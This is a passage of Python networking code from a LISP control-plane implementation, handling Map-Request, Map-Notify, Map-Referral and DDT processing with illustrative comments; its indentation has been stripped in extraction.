first_long = (LISP_MAP_NOTIFY << 28) | record_count
header = struct.pack("I", socket.htonl(first_long))
auth = struct.pack("I", 0)
#
# Concat fields of Map-Notify.
#
packet = header + nonce + auth + packet
return(packet)
#enddef
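#
# Worked example (illustrative): for a Map-Reply carrying one EID-record, the
# rewritten first long is (LISP_MAP_NOTIFY << 28) | 1 = 0x40000001 (message
# type 4), the 8-byte nonce is carried over unchanged, and the 4 zero bytes
# inserted after it encode Key-ID 0, Alg-ID 0, and Authentication Length 0.
#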
#
# lisp_notify_subscribers
#
# There has been an RLOC-set change, inform all subscribers who have subscribed
# to this EID-prefix.
#
def lisp_notify_subscribers(lisp_sockets, eid_record, eid, site):
eid_str = eid.print_prefix()
if (lisp_pubsub_cache.has_key(eid_str) == False): return
for pubsub in lisp_pubsub_cache[eid_str].values():
itr = pubsub.itr
port = pubsub.port
itr_str = red(itr.print_address_no_iid(), False)
sub_str = bold("subscriber", False)
xtr_id = "0x" + lisp_hex_string(pubsub.xtr_id)
nonce = "0x" + lisp_hex_string(pubsub.nonce)
lprint(" Notify {} {}:{} xtr-id {} for {}, nonce {}".format( \
sub_str, itr_str, port, xtr_id, green(eid_str, False), nonce))
lisp_build_map_notify(lisp_sockets, eid_record, [eid_str], 1, itr,
port, pubsub.nonce, 0, 0, 0, site, False)
pubsub.map_notify_count += 1
#endfor
return
#enddef
#
# lisp_process_pubsub
#
# Take a fully built Map-Reply and send a Map-Notify as a pubsub ack.
#
def lisp_process_pubsub(lisp_sockets, packet, reply_eid, itr_rloc, port, nonce,
ttl, xtr_id):
#
# Store subscriber state.
#
lisp_store_pubsub_state(reply_eid, itr_rloc, port, nonce, ttl, xtr_id)
eid = green(reply_eid.print_prefix(), False)
itr = red(itr_rloc.print_address_no_iid(), False)
mn = bold("Map-Notify", False)
xtr_id = "0x" + lisp_hex_string(xtr_id)
lprint("{} pubsub request for {} to ack ITR {} xtr-id: {}".format(mn,
eid, itr, xtr_id))
#
# Convert Map-Reply to Map-Notify header and send out.
#
packet = lisp_convert_reply_to_notify(packet)
lisp_send_map_notify(lisp_sockets, packet, itr_rloc, port)
return
#enddef
#
# lisp_ms_process_map_request
#
# Do Map-Server processing of a Map-Request. Returns various LISP-DDT internal
# and external action values.
#
def lisp_ms_process_map_request(lisp_sockets, packet, map_request, mr_source,
mr_sport, ecm_source):
#
# Look up EID in site cache. If we find it and it has registered for
# proxy-replying, this map-server will send the Map-Reply. Otherwise,
# send to one of the ETRs at the registered site.
#
eid = map_request.target_eid
group = map_request.target_group
eid_str = lisp_print_eid_tuple(eid, group)
itr_rloc = map_request.itr_rlocs[0]
xtr_id = map_request.xtr_id
nonce = map_request.nonce
action = LISP_NO_ACTION
pubsub = map_request.subscribe_bit
#
# Check if we are verifying Map-Request signatures. If so, do a mapping
# database lookup on the source-EID to get public-key.
#
sig_good = True
is_crypto_hash = (lisp_get_eid_hash(eid) != None)
if (is_crypto_hash):
sig = map_request.map_request_signature
if (sig == None):
sig_good = False
lprint(("EID-crypto-hash signature verification {}, " + \
"no signature found").format(bold("failed", False)))
else:
sig_eid = map_request.signature_eid
hash_eid, pubkey, sig_good = lisp_lookup_public_key(sig_eid)
if (sig_good):
sig_good = map_request.verify_map_request_sig(pubkey)
else:
lprint("Public-key lookup failed for sig-eid {}, hash-eid {}".\
format(sig_eid.print_address(), hash_eid.print_address()))
#endif
pf = bold("passed", False) if sig_good else bold("failed", False)
lprint("EID-crypto-hash signature verification {}".format(pf))
#endif
#endif
if (pubsub and sig_good == False):
pubsub = False
lprint("Suppress creating pubsub state due to signature failure")
#endif
#
# There are two cases here that need attention. If the Map-Request was
# an IPv6 Map-Request but the ECM came to us in an IPv4 packet, we need
# to return the Map-Reply in IPv4. And if the Map-Request came to us
# through a NAT, sending the Map-Reply to the Map-Request port won't
# get translated by the NAT. So we have to return the Map-Reply to the
# ECM port. Hopefully, the RTR is listening on the ECM port and using
# the Map-Request port as the ECM port as well. This is typically only
# a problem on the RTR, when behind a NAT. For an ITR, it usually
# doesn't send Map-Requests since NAT-traversal logic installs default
# map-cache entries.
#
reply_dest = itr_rloc if (itr_rloc.afi == ecm_source.afi) else ecm_source
site_eid = lisp_site_eid_lookup(eid, group, False)
if (site_eid == None or site_eid.is_star_g()):
notfound = bold("Site not found", False)
lprint("{} for requested EID {}".format(notfound,
green(eid_str, False)))
#
# Send negative Map-Reply with TTL 15 minutes.
#
lisp_send_negative_map_reply(lisp_sockets, eid, group, nonce, itr_rloc,
mr_sport, 15, xtr_id, pubsub)
return([eid, group, LISP_DDT_ACTION_SITE_NOT_FOUND])
#endif
prefix_str = site_eid.print_eid_tuple()
site_name = site_eid.site.site_name
#
# If we are requesting for non crypto-EIDs, signatures are configured to be
# required, and no signature is in the Map-Request, bail.
#
if (is_crypto_hash == False and site_eid.require_signature):
sig = map_request.map_request_signature
sig_eid = map_request.signature_eid
if (sig == None or sig_eid.is_null()):
lprint("Signature required for site {}".format(site_name))
sig_good = False
else:
sig_eid = map_request.signature_eid
hash_eid, pubkey, sig_good = lisp_lookup_public_key(sig_eid)
if (sig_good):
sig_good = map_request.verify_map_request_sig(pubkey)
else:
lprint("Public-key lookup failed for sig-eid {}, hash-eid {}".\
format(sig_eid.print_address(), hash_eid.print_address()))
#endif
pf = bold("passed", False) if sig_good else bold("failed", False)
lprint("Required signature verification {}".format(pf))
#endif
#endif
#
# Check if site-eid is registered.
#
if (sig_good and site_eid.registered == False):
lprint("Site '{}' with EID-prefix {} is not registered for EID {}". \
format(site_name, green(prefix_str, False), green(eid_str, False)))
#
# We do not want to return a coarser EID-prefix to the Map-Resolver. The
# AMS site entry may be one.
#
if (site_eid.accept_more_specifics == False):
eid = site_eid.eid
group = site_eid.group
#endif
#
# Send forced-TTLs even for native-forward entries.
#
ttl = 1
if (site_eid.force_ttl != None):
ttl = site_eid.force_ttl | 0x80000000
#endif
#
# Send negative Map-Reply with TTL 1 minute.
#
lisp_send_negative_map_reply(lisp_sockets, eid, group, nonce, itr_rloc,
mr_sport, ttl, xtr_id, pubsub)
return([eid, group, LISP_DDT_ACTION_MS_NOT_REG])
#endif
#
# Should we proxy-reply?
#
nat = False
pr_str = ""
check_policy = False
if (site_eid.force_nat_proxy_reply):
pr_str = ", nat-forced"
nat = True
check_policy = True
elif (site_eid.force_proxy_reply):
pr_str = ", forced"
check_policy = True
elif (site_eid.proxy_reply_requested):
pr_str = ", requested"
check_policy = True
elif (map_request.pitr_bit and site_eid.pitr_proxy_reply_drop):
pr_str = ", drop-to-pitr"
action = LISP_DROP_ACTION
elif (site_eid.proxy_reply_action != ""):
action = site_eid.proxy_reply_action
pr_str = ", forced, action {}".format(action)
action = LISP_DROP_ACTION if (action == "drop") else \
LISP_NATIVE_FORWARD_ACTION
#endif
#
# Apply policy to determine if we send a negative map-reply with action
# "policy-denied" or we send a map-reply with the policy set parameters.
#
policy_drop = False
policy = None
if (check_policy and lisp_policies.has_key(site_eid.policy)):
p = lisp_policies[site_eid.policy]
if (p.match_policy_map_request(map_request, mr_source)): policy = p
if (policy):
ps = bold("matched", False)
lprint("Map-Request {} policy '{}', set-action '{}'".format(ps,
p.policy_name, p.set_action))
else:
ps = bold("no match", False)
lprint("Map-Request {} for policy '{}', implied drop".format(ps,
p.policy_name))
policy_drop = True
#endif
#endif
if (pr_str != ""):
lprint("Proxy-replying for EID {}, found site '{}' EID-prefix {}{}". \
format(green(eid_str, False), site_name, green(prefix_str, False),
pr_str))
rloc_set = site_eid.registered_rlocs
ttl = 1440
if (nat):
if (site_eid.site_id != 0):
seid = map_request.source_eid
rloc_set = lisp_get_private_rloc_set(site_eid, seid, group)
#endif
if (rloc_set == site_eid.registered_rlocs):
m = (site_eid.group.is_null() == False)
new_set = lisp_get_partial_rloc_set(rloc_set, reply_dest, m)
if (new_set != rloc_set):
ttl = 15
rloc_set = new_set
#endif
#endif
#endif
#
# Force TTL if configured. To denote seconds in TTL field of EID-record
# set high-order bit in ttl value.
#
if (site_eid.force_ttl != None):
ttl = site_eid.force_ttl | 0x80000000
#endif
#
# Does policy say what the ttl should be? And whether we should drop the
# Map-Request and return a negative Map-Reply.
#
if (policy):
if (policy.set_record_ttl):
ttl = policy.set_record_ttl
lprint("Policy set-record-ttl to {}".format(ttl))
#endif
if (policy.set_action == "drop"):
lprint("Policy set-action drop, send negative Map-Reply")
action = LISP_POLICY_DENIED_ACTION
rloc_set = []
else:
rloc = policy.set_policy_map_reply()
if (rloc): rloc_set = [rloc]
#endif
#endif
if (policy_drop):
lprint("Implied drop action, send negative Map-Reply")
action = LISP_POLICY_DENIED_ACTION
rloc_set = []
#endif
enc = site_eid.echo_nonce_capable
#
# Don't tell spoofer any prefix information about the target EID.
#
if (sig_good):
reply_eid = site_eid.eid
reply_group = site_eid.group
else:
reply_eid = eid
reply_group = group
action = LISP_AUTH_FAILURE_ACTION
rloc_set = []
#endif
#
# If this Map-Request is also a subscription request, return same
# information in a Map-Notify.
#
packet = lisp_build_map_reply(reply_eid, reply_group, rloc_set,
nonce, action, ttl, map_request, None, enc, False)
if (pubsub):
lisp_process_pubsub(lisp_sockets, packet, reply_eid, itr_rloc,
mr_sport, nonce, ttl, xtr_id)
else:
lisp_send_map_reply(lisp_sockets, packet, itr_rloc, mr_sport)
#endif
return([site_eid.eid, site_eid.group, LISP_DDT_ACTION_MS_ACK])
#endif
#
# If there are no registered RLOCs, return.
#
rloc_count = len(site_eid.registered_rlocs)
if (rloc_count == 0):
lprint("Requested EID {} found site '{}' with EID-prefix {} with " + \
"no registered RLOCs".format(green(eid_str, False), site_name,
green(prefix_str, False)))
return([site_eid.eid, site_eid.group, LISP_DDT_ACTION_MS_ACK])
#endif
#
# Forward to ETR at registered site. We have to put in an ECM.
#
hash_address = map_request.target_eid if map_request.source_eid.is_null() \
else map_request.source_eid
hashval = map_request.target_eid.hash_address(hash_address)
hashval %= rloc_count
etr = site_eid.registered_rlocs[hashval]
if (etr.rloc.is_null()):
lprint(("Suppress forwarding Map-Request for EID {} at site '{}' " + \
"EID-prefix {}, no RLOC address").format(green(eid_str, False),
site_name, green(prefix_str, False)))
else:
lprint(("Forwarding Map-Request for EID {} to ETR {} at site '{}' " + \
"EID-prefix {}").format(green(eid_str, False),
red(etr.rloc.print_address(), False), site_name,
green(prefix_str, False)))
#
# Send ECM.
#
lisp_send_ecm(lisp_sockets, packet, map_request.source_eid, mr_sport,
map_request.target_eid, etr.rloc, to_etr=True)
#endif
return([site_eid.eid, site_eid.group, LISP_DDT_ACTION_MS_ACK])
#enddef
#
# lisp_ddt_process_map_request
#
# Do DDT-node processing of a Map-Request received from an Map-Resolver.
#
def lisp_ddt_process_map_request(lisp_sockets, map_request, ecm_source, port):
#
# Lookup target EID address in DDT cache.
#
eid = map_request.target_eid
group = map_request.target_group
eid_str = lisp_print_eid_tuple(eid, group)
nonce = map_request.nonce
action = LISP_DDT_ACTION_NULL
#
# First check to see if EID is registered locally if we are a Map-Server.
# Otherwise, do DDT lookup.
#
ddt_entry = None
if (lisp_i_am_ms):
site_eid = lisp_site_eid_lookup(eid, group, False)
if (site_eid == None): return
if (site_eid.registered):
action = LISP_DDT_ACTION_MS_ACK
ttl = 1440
else:
eid, group, action = lisp_ms_compute_neg_prefix(eid, group)
action = LISP_DDT_ACTION_MS_NOT_REG
ttl = 1
#endif
else:
ddt_entry = lisp_ddt_cache_lookup(eid, group, False)
if (ddt_entry == None):
action = LISP_DDT_ACTION_NOT_AUTH
ttl = 0
lprint("DDT delegation entry not found for EID {}".format( \
green(eid_str, False)))
elif (ddt_entry.is_auth_prefix()):
#
# Check auth-prefix. That means there are no referrals.
#
action = LISP_DDT_ACTION_DELEGATION_HOLE
ttl = 15
ddt_entry_str = ddt_entry.print_eid_tuple()
lprint(("DDT delegation entry not found but auth-prefix {} " + \
"found for EID {}").format(ddt_entry_str,
green(eid_str, False)))
if (group.is_null()):
eid = lisp_ddt_compute_neg_prefix(eid, ddt_entry,
lisp_ddt_cache)
else:
group = lisp_ddt_compute_neg_prefix(group, ddt_entry,
lisp_ddt_cache)
eid = lisp_ddt_compute_neg_prefix(eid, ddt_entry,
ddt_entry.source_cache)
#endif
ddt_entry = None
else:
ddt_entry_str = ddt_entry.print_eid_tuple()
lprint("DDT delegation entry {} found for EID {}".format( \
ddt_entry_str, green(eid_str, False)))
ttl = 1440
#endif
#endif
#
# Build and return a Map-Referral message to the source of the Map-Request.
#
packet = lisp_build_map_referral(eid, group, ddt_entry, action, ttl, nonce)
nonce = map_request.nonce >> 32
if (map_request.nonce != 0 and nonce != 0xdfdf0e1d): port = LISP_CTRL_PORT
lisp_send_map_referral(lisp_sockets, packet, ecm_source, port)
return
#enddef
#
# lisp_find_negative_mask_len
#
# XOR the two addresses so we can find the first bit that is different. Then
# count the number of bits from the left that bit position is. That is the
# new mask-length. Compare to the neg-prefix mask-length we have found so
# far. If the new one is longer than the stored one so far, replace it.
#
# This function assumes the address size and the address-family are the same
# for 'eid' and 'entry_prefix'. Caller must make sure of that.
#
def lisp_find_negative_mask_len(eid, entry_prefix, neg_prefix):
diff_address = eid.hash_address(entry_prefix)
address_size = eid.addr_length() * 8
mask_len = 0
#
# The first set bit is the one that is different.
#
for mask_len in range(address_size):
bit_test = 1 << (address_size - mask_len - 1)
if (diff_address & bit_test): break
#endfor
if (mask_len > neg_prefix.mask_len): neg_prefix.mask_len = mask_len
return
#enddef
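#
# Worked example (illustrative): for eid 10.1.1.1 and entry_prefix 10.1.0.0
# the XOR is 0x00000101; the first set bit from the left is bit 23, so
# mask_len becomes 23 and replaces neg_prefix.mask_len if 23 is larger than
# the value stored so far.
#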
#
# lisp_neg_prefix_walk
#
# Callback routine to decide which prefixes should be considered by function
# lisp_find_negative_mask_len().
#
# 'entry' in this routine could be a lisp_ddt_entry() or a lisp_site_eid().
#
def lisp_neg_prefix_walk(entry, parms):
eid, auth_prefix, neg_prefix = parms
if (auth_prefix == None):
if (entry.eid.instance_id != eid.instance_id):
return([True, parms])
#endif
if (entry.eid.afi != eid.afi): return([True, parms])
else:
if (entry.eid.is_more_specific(auth_prefix) == False):
return([True, parms])
#endif
#endif
#
# Find bits that match.
#
lisp_find_negative_mask_len(eid, entry.eid, neg_prefix)
return([True, parms])
#enddef
#
# lisp_ddt_compute_neg_prefix
#
# Walk the DDT cache to compute the least specific prefix within the auth-
# prefix found.
#
def lisp_ddt_compute_neg_prefix(eid, ddt_entry, cache):
#
# Do not compute negative prefixes for distinguished-names or geo-prefixes.
#
if (eid.is_binary() == False): return(eid)
neg_prefix = lisp_address(eid.afi, "", 0, 0)
neg_prefix.copy_address(eid)
neg_prefix.mask_len = 0
auth_prefix_str = ddt_entry.print_eid_tuple()
auth_prefix = ddt_entry.eid
#
# Walk looking for the shortest prefix that does NOT match any site EIDs
# configured.
#
eid, auth_prefix, neg_prefix = cache.walk_cache(lisp_neg_prefix_walk,
(eid, auth_prefix, neg_prefix))
#
# Store high-order bits that are covered by the mask-length.
#
neg_prefix.mask_address(neg_prefix.mask_len)
lprint(("Least specific prefix computed from ddt-cache for EID {} " + \
"using auth-prefix {} is {}").format(green(eid.print_address(), False),
auth_prefix_str, neg_prefix.print_prefix()))
return(neg_prefix)
#enddef
#
# lisp_ms_compute_neg_prefix
#
# From the site cache and the DDT cache, compute a negative EID-prefix to not
# be shorter than a configured authoritative-prefix.
#
def lisp_ms_compute_neg_prefix(eid, group):
neg_prefix = lisp_address(eid.afi, "", 0, 0)
neg_prefix.copy_address(eid)
neg_prefix.mask_len = 0
gneg_prefix = lisp_address(group.afi, "", 0, 0)
gneg_prefix.copy_address(group)
gneg_prefix.mask_len = 0
auth_prefix = None
#
# Look for auth-prefix in DDT cache. If not found, we return the host
# based EID in a negative Map-Referral, action non-authoritative.
#
if (group.is_null()):
ddt_entry = lisp_ddt_cache.lookup_cache(eid, False)
if (ddt_entry == None):
neg_prefix.mask_len = neg_prefix.host_mask_len()
gneg_prefix.mask_len = gneg_prefix.host_mask_len()
return([neg_prefix, gneg_prefix, LISP_DDT_ACTION_NOT_AUTH])
#endif
cache = lisp_sites_by_eid
if (ddt_entry.is_auth_prefix()): auth_prefix = ddt_entry.eid
else:
ddt_entry = lisp_ddt_cache.lookup_cache(group, False)
if (ddt_entry == None):
neg_prefix.mask_len = neg_prefix.host_mask_len()
gneg_prefix.mask_len = gneg_prefix.host_mask_len()
return([neg_prefix, gneg_prefix, LISP_DDT_ACTION_NOT_AUTH])
#endif
if (ddt_entry.is_auth_prefix()): auth_prefix = ddt_entry.group
group, auth_prefix, gneg_prefix = lisp_sites_by_eid.walk_cache( \
lisp_neg_prefix_walk, (group, auth_prefix, gneg_prefix))
gneg_prefix.mask_address(gneg_prefix.mask_len)
lprint(("Least specific prefix computed from site-cache for " + \
"group EID {} using auth-prefix {} is {}").format( \
group.print_address(), auth_prefix.print_prefix() if \
(auth_prefix != None) else "'not found'",
gneg_prefix.print_prefix()))
cache = ddt_entry.source_cache
#endif
#
# Return the auth-prefix if we found it in the DDT cache.
#
action = LISP_DDT_ACTION_DELEGATION_HOLE if (auth_prefix != None) else \
LISP_DDT_ACTION_NOT_AUTH
#
# Walk looking for the shortest prefix that does NOT match any site EIDs
# configured.
#
eid, auth_prefix, neg_prefix = cache.walk_cache(lisp_neg_prefix_walk,
(eid, auth_prefix, neg_prefix))
#
# Store high-order bits that are covered by the mask-length.
#
neg_prefix.mask_address(neg_prefix.mask_len)
lprint(("Least specific prefix computed from site-cache for EID {} " + \
"using auth-prefix {} is {}").format( \
green(eid.print_address(), False),
auth_prefix.print_prefix() if (auth_prefix != None) else \
"'not found'", neg_prefix.print_prefix()))
return([neg_prefix, gneg_prefix, action])
#enddef
#
# lisp_ms_send_map_referral
#
# This function is for a Map-Server to send a Map-Referral to a requesting
# node.
#
def lisp_ms_send_map_referral(lisp_sockets, map_request, ecm_source, port,
action, eid_prefix, group_prefix):
eid = map_request.target_eid
group = map_request.target_group
nonce = map_request.nonce
if (action == LISP_DDT_ACTION_MS_ACK): ttl = 1440
#
# Build Map-Server specific Map-Referral.
#
map_referral = lisp_map_referral()
map_referral.record_count = 1
map_referral.nonce = nonce
packet = map_referral.encode()
map_referral.print_map_referral()
incomplete = False
#
# Figure out what action code, EID-prefix, and ttl to return in the EID-
# record. Temporarily return the requested prefix until we have
# lisp_ms_compute_neg_prefix() working.
#
if (action == LISP_DDT_ACTION_SITE_NOT_FOUND):
eid_prefix, group_prefix, action = lisp_ms_compute_neg_prefix(eid,
group)
ttl = 15
#endif
if (action == LISP_DDT_ACTION_MS_NOT_REG): ttl = 1
if (action == LISP_DDT_ACTION_MS_ACK): ttl = 1440
if (action == LISP_DDT_ACTION_DELEGATION_HOLE): ttl = 15
if (action == LISP_DDT_ACTION_NOT_AUTH): ttl = 0
is_ms_peer = False
rloc_count = 0
ddt_entry = lisp_ddt_cache_lookup(eid, group, False)
if (ddt_entry != None):
rloc_count = len(ddt_entry.delegation_set)
is_ms_peer = ddt_entry.is_ms_peer_entry()
ddt_entry.map_referrals_sent += 1
#endif
#
# Conditions when the incomplete bit should be set in the Map-Referral.
#
if (action == LISP_DDT_ACTION_NOT_AUTH): incomplete = True
if (action in (LISP_DDT_ACTION_MS_REFERRAL, LISP_DDT_ACTION_MS_ACK)):
incomplete = (is_ms_peer == False)
#endif
#
# Store info in EID-record.
#
eid_record = lisp_eid_record()
eid_record.rloc_count = rloc_count
eid_record.authoritative = True
eid_record.action = action
eid_record.ddt_incomplete = incomplete
eid_record.eid = eid_prefix
eid_record.group = group_prefix
eid_record.record_ttl = ttl
packet += eid_record.encode()
eid_record.print_record(" ", True)
#
# Build referral-set.
#
if (rloc_count != 0):
for ddt_node in ddt_entry.delegation_set:
rloc_record = lisp_rloc_record()
rloc_record.rloc = ddt_node.delegate_address
rloc_record.priority = ddt_node.priority
rloc_record.weight = ddt_node.weight
rloc_record.mpriority = 255
rloc_record.mweight = 0
rloc_record.reach_bit = True
packet += rloc_record.encode()
rloc_record.print_record(" ")
#endfor
#endif
#
# Build packet and send Map-Referral message to the source of the
# Map-Request.
#
if (map_request.nonce != 0): port = LISP_CTRL_PORT
lisp_send_map_referral(lisp_sockets, packet, ecm_source, port)
return
#enddef
#
# lisp_send_negative_map_reply
#
# Send a negative Map-Reply. This is one with a specific action code and zero
# RLOCs in the locator-set.
#
def lisp_send_negative_map_reply(sockets, eid, group, nonce, dest, port, ttl,
xtr_id, pubsub):
lprint("Build negative Map-Reply EID-prefix {}, nonce 0x{} to ITR {}". \
format(lisp_print_eid_tuple(eid, group), lisp_hex_string(nonce),
red(dest.print_address(), False)))
action = LISP_NATIVE_FORWARD_ACTION if group.is_null() else \
LISP_DROP_ACTION
#
# If this is a crypto-EID, return LISP_SEND_MAP_REQUEST_ACTION.
#
if (lisp_get_eid_hash(eid) != None):
action = LISP_SEND_MAP_REQUEST_ACTION
#endif
packet = lisp_build_map_reply(eid, group, [], nonce, action, ttl, None,
None, False, False)
#
# Send Map-Notify if this Map-Request is a subscribe-request.
#
if (pubsub):
lisp_process_pubsub(sockets, packet, eid, dest, port, nonce, ttl,
xtr_id)
else:
lisp_send_map_reply(sockets, packet, dest, port)
#endif
return
#enddef
#
# lisp_retransmit_ddt_map_request
#
# Have the Map-Resolver retransmit a DDT Map-Request.
#
def lisp_retransmit_ddt_map_request(mr):
seid_str = mr.mr_source.print_address()
deid_str = mr.print_eid_tuple()
nonce = mr.nonce
#
# Get the referral-node we sent the Map-Request to last time. We need
# to increment its no-response counter.
#
if (mr.last_request_sent_to):
last_node = mr.last_request_sent_to.print_address()
ref = lisp_referral_cache_lookup(mr.last_cached_prefix[0],
mr.last_cached_prefix[1], True)
if (ref and ref.referral_set.has_key(last_node)):
ref.referral_set[last_node].no_responses += 1
#endif
#endif
#
# Did we reach the max number of retries? We are giving up since no
# replies have been received.
#
if (mr.retry_count == LISP_MAX_MAP_NOTIFY_RETRIES):
lprint("DDT Map-Request retry limit reached for EID {}, nonce 0x{}". \
format(green(deid_str, False), lisp_hex_string(nonce)))
mr.dequeue_map_request()
return
#endif
mr.retry_count += 1
s = green(seid_str, False)
d = green(deid_str, False)
lprint("Retransmit DDT {} from {}ITR {} EIDs: {} -> {}, nonce 0x{}". \
format(bold("Map-Request", False), "P" if mr.from_pitr else "",
red(mr.itr.print_address(), False), s, d,
lisp_hex_string(nonce)))
#
# Do referral lookup and send the DDT Map-Request again.
#
lisp_send_ddt_map_request(mr, False)
#
# Restart retransmit timer.
#
mr.retransmit_timer = threading.Timer(LISP_DDT_MAP_REQUEST_INTERVAL,
lisp_retransmit_ddt_map_request, [mr])
mr.retransmit_timer.start()
return
#enddef
#
# lisp_get_referral_node
#
# Get a referral-node of highest priority that is in the up state. Returns
# class lisp_referral_node().
#
def lisp_get_referral_node(referral, source_eid, dest_eid):
#
# Build list of high-priority up referral-nodes.
#
ref_set = []
for ref_node in referral.referral_set.values():
if (ref_node.updown == False): continue
if (len(ref_set) == 0 or ref_set[0].priority == ref_node.priority):
ref_set.append(ref_node)
elif (ref_set[0].priority > ref_node.priority):
ref_set = []
ref_set.append(ref_node)
#endif
#endfor
ref_count = len(ref_set)
if (ref_count == 0): return(None)
hashval = dest_eid.hash_address(source_eid)
hashval = hashval % ref_count
return(ref_set[hashval])
#enddef
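#
# Selection sketch (illustrative): if two referral-nodes are up at the best
# (lowest) priority, ref_set has length 2 and the chosen node is
# ref_set[dest_eid.hash_address(source_eid) % 2], so a given EID pair keeps
# mapping to the same referral-node while both stay up.
#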
#
# lisp_send_ddt_map_request
#
# Send a DDT Map-Request based on an EID lookup in the referral cache.
#
def lisp_send_ddt_map_request(mr, send_to_root):
lisp_sockets = mr.lisp_sockets
nonce = mr.nonce
itr = mr.itr
mr_source = mr.mr_source
eid_str = mr.print_eid_tuple()
#
# Check if the maximum allowable Map-Requests have been sent for this
# map-request-queue entry.
#
if (mr.send_count == 8):
lprint("Giving up on map-request-queue entry {}, nonce 0x{}".format( \
green(eid_str, False), lisp_hex_string(nonce)))
mr.dequeue_map_request()
return
#endif
#
# If the caller wants us to use the root versus a best-match lookup. We only
# do this once per Map-Request queue entry.
#
if (send_to_root):
lookup_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
lookup_group = lisp_address(LISP_AFI_NONE, "", 0, 0)
mr.tried_root = True
lprint("Jumping up to root for EID {}".format(green(eid_str, False)))
else:
lookup_eid = mr.eid
lookup_group = mr.group
#endif
#
# Do longest match on EID into DDT referral cache.
#
referral = lisp_referral_cache_lookup(lookup_eid, lookup_group, False)
if (referral == None):
lprint("No referral cache entry found")
lisp_send_negative_map_reply(lisp_sockets, lookup_eid, lookup_group,
nonce, itr, mr.sport, 15, None, False)
return
#endif
ref_str = referral.print_eid_tuple()
lprint("Found referral cache entry {}, referral-type: {}".format(ref_str,
referral.print_referral_type()))
ref_node = lisp_get_referral_node(referral, mr_source, mr.eid)
if (ref_node == None):
lprint("No reachable referral-nodes found")
mr.dequeue_map_request()
lisp_send_negative_map_reply(lisp_sockets, referral.eid,
referral.group, nonce, itr, mr.sport, 1, None, False)
return
#endif
lprint("Send DDT Map-Request to {} {} for EID {}, nonce 0x{}". \
format(ref_node.referral_address.print_address(),
referral.print_referral_type(), green(eid_str, False),
lisp_hex_string(nonce)))
#
# Encapsulate Map-Request and send out.
#
to_ms = (referral.referral_type == LISP_DDT_ACTION_MS_REFERRAL or
referral.referral_type == LISP_DDT_ACTION_MS_ACK)
lisp_send_ecm(lisp_sockets, mr.packet, mr_source, mr.sport, mr.eid,
ref_node.referral_address, to_ms=to_ms, ddt=True)
#
# Do some stats.
#
mr.last_request_sent_to = ref_node.referral_address
mr.last_sent = lisp_get_timestamp()
mr.send_count += 1
ref_node.map_requests_sent += 1
return
#enddef
#
# lisp_mr_process_map_request
#
# Process a Map-Request received from an ITR. We need to forward this Map-Request
# to the longest matched referral from the referral-cache.
#
def lisp_mr_process_map_request(lisp_sockets, packet, map_request, ecm_source,
sport, mr_source):
eid = map_request.target_eid
group = map_request.target_group
deid_str = map_request.print_eid_tuple()
seid_str = mr_source.print_address()
nonce = map_request.nonce
s = green(seid_str, False)
d = green(deid_str, False)
lprint("Received Map-Request from {}ITR {} EIDs: {} -> {}, nonce 0x{}". \
format("P" if map_request.pitr_bit else "",
red(ecm_source.print_address(), False), s, d,
lisp_hex_string(nonce)))
#
# Queue the Map-Request. We need to reliably transmit it.
#
mr = lisp_ddt_map_request(lisp_sockets, packet, eid, group, nonce)
mr.packet = packet
mr.itr = ecm_source
mr.mr_source = mr_source
mr.sport = sport
mr.from_pitr = map_request.pitr_bit
mr.queue_map_request()
lisp_send_ddt_map_request(mr, False)
return
#enddef
#
# lisp_process_map_request
#
# Process received Map-Request as a Map-Server or an ETR.
#
def lisp_process_map_request(lisp_sockets, packet, ecm_source, ecm_port,
mr_source, mr_port, ddt_request, ttl, timestamp):
orig_packet = packet
map_request = lisp_map_request()
packet = map_request.decode(packet, mr_source, mr_port)
if (packet == None):
lprint("Could not decode Map-Request packet")
return
#endif
map_request.print_map_request()
#
# If RLOC-probe request, process separately.
#
if (map_request.rloc_probe):
lisp_process_rloc_probe_request(lisp_sockets, map_request, mr_source,
mr_port, ttl, timestamp)
return
#endif
#
# Process SMR.
#
if (map_request.smr_bit):
lisp_process_smr(map_request)
#endif
#
# Process SMR-invoked Map-Request.
#
if (map_request.smr_invoked_bit):
lisp_process_smr_invoked_request(map_request)
#endif
#
# Do ETR processing of the Map-Request if we found a database-mapping.
#
if (lisp_i_am_etr):
lisp_etr_process_map_request(lisp_sockets, map_request, mr_source,
mr_port, ttl, timestamp)
#endif
#
# Do Map-Server processing of the Map-Request.
#
if (lisp_i_am_ms):
packet = orig_packet
eid, group, ddt_action = lisp_ms_process_map_request(lisp_sockets,
orig_packet, map_request, mr_source, mr_port, ecm_source)
if (ddt_request):
lisp_ms_send_map_referral(lisp_sockets, map_request, ecm_source,
ecm_port, ddt_action, eid, group)
#endif
return
#endif
#
# Map-Request is from an ITR destined to a Map-Resolver.
#
if (lisp_i_am_mr and not ddt_request):
lisp_mr_process_map_request(lisp_sockets, orig_packet, map_request,
ecm_source, mr_port, mr_source)
#endif
#
# Do DDT-node processing of the Map-Request.
#
if (lisp_i_am_ddt or ddt_request):
packet = orig_packet
lisp_ddt_process_map_request(lisp_sockets, map_request, ecm_source,
ecm_port)
#endif
return
#enddef
#
# lisp_store_mr_stats
#
# Store counter and timing stats for the map-resolver that just sent us a
# negative Map-Reply.
#
def lisp_store_mr_stats(source, nonce):
mr = lisp_get_map_resolver(source, None)
if (mr == None): return
#
# Count and record timestamp.
#
mr.neg_map_replies_received += 1
mr.last_reply = lisp_get_timestamp()
#
# For every 100 replies, reset the total_rtt so we can get a new average.
#
if ((mr.neg_map_replies_received % 100) == 0): mr.total_rtt = 0
#
# If Map-Reply matches stored nonce, then we can do an RTT calculation.
#
if (mr.last_nonce == nonce):
mr.total_rtt += (time.time() - mr.last_used)
mr.last_nonce = 0
#endif
if ((mr.neg_map_replies_received % 10) == 0): mr.last_nonce = 0
return
#enddef
#
# lisp_process_map_reply
#
# Process received Map-Reply.
#
def lisp_process_map_reply(lisp_sockets, packet, source, ttl, itr_in_ts):
global lisp_map_cache
map_reply = lisp_map_reply()
packet = map_reply.decode(packet)
if (packet == None):
lprint("Could not decode Map-Reply packet")
return
#endif
map_reply.print_map_reply()
#
# Process each EID record in Map-Reply message.
#
rloc_key_change = None
for i in range(map_reply.record_count):
eid_record = lisp_eid_record()
packet = eid_record.decode(packet)
if (packet == None):
lprint("Could not decode EID-record in Map-Reply packet")
return
#endif
eid_record.print_record(" ", False)
#
        # If negative Map-Reply, see if it is from a Map-Resolver and do some
        # counting and timing stats.
#
